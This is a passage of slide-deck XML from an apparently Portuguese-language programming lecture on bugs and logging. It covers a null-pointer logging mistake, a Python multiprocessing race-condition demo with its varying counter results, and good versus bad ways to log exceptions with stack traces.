              </a:rPr>
              <a:t>// Will throw NPE if userId is null</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.info("userId: {}", userId.toString());</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="580" name="Google Shape;580;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6645875" y="2698325"/>
            <a:ext cx="4419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200">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
              </a:rPr>
              <a:t>❌</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="581" name="Google Shape;581;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629400" y="1600200"/>
            <a:ext cx="5487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200"/>
              <a:t>✅</a:t>
            </a:r>
            <a:endParaRPr sz="32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30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="430375" y="1145725"/>
            <a:ext cx="6546300" cy="38481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n">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> multiprocessing </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> Process, Value</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>counter = Value('i', 0)  # Shared integer value</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> increment():</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> _ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> range(1000):</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    temp = counter.value</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    temp += 1</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    counter.value = temp</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>processes = [Process(target=increment) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> _ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> range(10)]</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> p in processes:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    p.start()</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> p in processes:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    p.join()</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>print(f"Final counter: {counter.value}") </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Google Shape;136;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7189650" y="1124075"/>
            <a:ext cx="2112000" cy="1970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rPr>
              <a:t>Final counter: 6096</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Final counter: 4692</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Final counter: 5293</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Final counter: 7270</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Google Shape;137;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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38" name="Google Shape;138;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1402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Bugs devido a condi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ções de corrida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>(dois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t> ou mais processos alteram uma variável ao mesmo tempo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>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5" name="Shape 585"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="586" name="Google Shape;586;p8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4. Logar a exce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ção "completa" (e não apenas msg) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100"/>
              <a:t>(sempre último argumento)</a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="587" name="Google Shape;587;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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588" name="Google Shape;588;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044475" y="1877550"/>
            <a:ext cx="21600" cy="1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2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589" name="Google Shape;589;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1612875"/>
            <a:ext cx="8752200" cy="2539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sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>// Good</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.error("Failed to process transaction", exception);</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>// Bad</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.error("Failed to process transaction: " + </a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>              exception.getMessage());</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="590" name="Google Shape;590;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229600" y="1752600"/>
            <a:ext cx="5487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200"/>
              <a:t>✅</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="591" name="Google Shape;591;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8246075" y="3079325"/>
            <a:ext cx="4419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200">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
              </a:rPr>
              <a:t>❌</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>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5" name="Shape 595"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="596" name="Google Shape;596;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3161975"/>
            <a:ext cx="8520600" cy="6687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1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>2024-12-01 15:23:45 [main] ERROR com.example.TransactionService - Failed to process transaction: Null pointer exception</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Google Shape;597;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="161875"/>
            <a:ext cx="8520600" cy="27096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200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>2024-12-01 15:23:45 [main] ERROR com.example.TransactionService - Failed to process transaction</a:t>
            </a:r>
            <a:endParaRPr sz="1200">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200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>java.lang.NullPointerException</a:t>
            </a:r>
            <a:endParaRPr sz="1200">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200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    at com.example.TransactionService.processPayment(TransactionService.java:45)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">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200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    at com.example.TransactionService.processTransaction(TransactionService.java:30)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">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200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
